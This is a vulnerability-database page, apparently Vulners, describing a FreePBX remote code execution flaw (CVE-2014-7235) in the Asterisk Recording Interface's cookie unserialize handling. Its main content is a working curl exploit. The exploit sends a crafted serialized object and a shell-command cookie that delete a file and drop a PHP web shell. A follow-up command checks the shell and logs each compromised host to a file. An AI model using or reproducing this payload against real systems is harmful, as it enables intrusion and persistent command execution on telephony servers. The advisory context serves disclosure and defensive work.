Vulners
Lucene search
Freepbx < 2.11.1.5 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Freepbx 2.11.1.5 - Remote Code Execution Vulnerability | 11 Jan 201700:00 | – | zdt |
 | CVE-2014-7235 | 5 Nov 202016:55 | – | circl |
 | FreePBX Framework Asterisk Recording Interface unserialize Code Execution (CVE-2014-7235) | 16 Dec 201400:00 | – | checkpoint_advisories |
 | CVE-2014-7235 | 7 Oct 201414:00 | – | cve |
 | CVE-2014-7235 | 7 Oct 201414:00 | – | cvelist |
 | Freepbx 2.11.1.5 - Remote Code Execution | 23 Dec 201600:00 | – | exploitpack |
 | FreePBX /recordings/index.php 'ari_auth' Cookie Authentication Bypass | 5 Feb 201500:00 | – | nessus |
 | CVE-2014-7235 | 7 Oct 201414:55 | – | nvd |
 | FreePBX < 2.9.0.9, 2.10.x < 2.11.1.5 RCE Vulnerability - Active Check | 6 Feb 201500:00 | – | openvas |
 | FreePBX Remote Code Execution | 9 Jan 201700:00 | – | packetstorm |
10
Exploit Title: Freepbx coockie recordings injection
Google Dork: Ask Santa
Date: 23/12/2016
Exploit Author: inj3ctor3
Vendor Homepage: https://www.freepbx.org/
Software Link: ISO LINKS IN SITE https://www.freepbx.org/
Version: ALL && unpatched/ (Trixbox/freepbx/elastix/pbxinflash/)
Tested on: Centos 6
CVE : CVE-2014-7235
1. Description
a critical Zero-Day Remote Code Execution and Privilege Escalation
exploit within the legacy “FreePBX ARI Framework module/Asterisk
Recording Interface (ARI)”.
htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x,
and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth coockie,
related to the PHP unserialize function
<?php
.....
...
line 56 $buf = unserialize(stripslashes($_COOKIE['ari_auth']));
line 57 list($data,$chksum) = $buf;
....
?>
A successful attack may compromise the whole system aiding the hacker to gain
further privileges via taking advantage of famous nmap shell
without further or do this is a poc code
curl -ks -m20 http://127.0.0.1/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "<?php if(\$_COOKIE[\"lang\"]) {system(\$_COOKIE[\"lang\"]);}die();?>");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null
if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Dec 2016 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 210
EPSS0.4866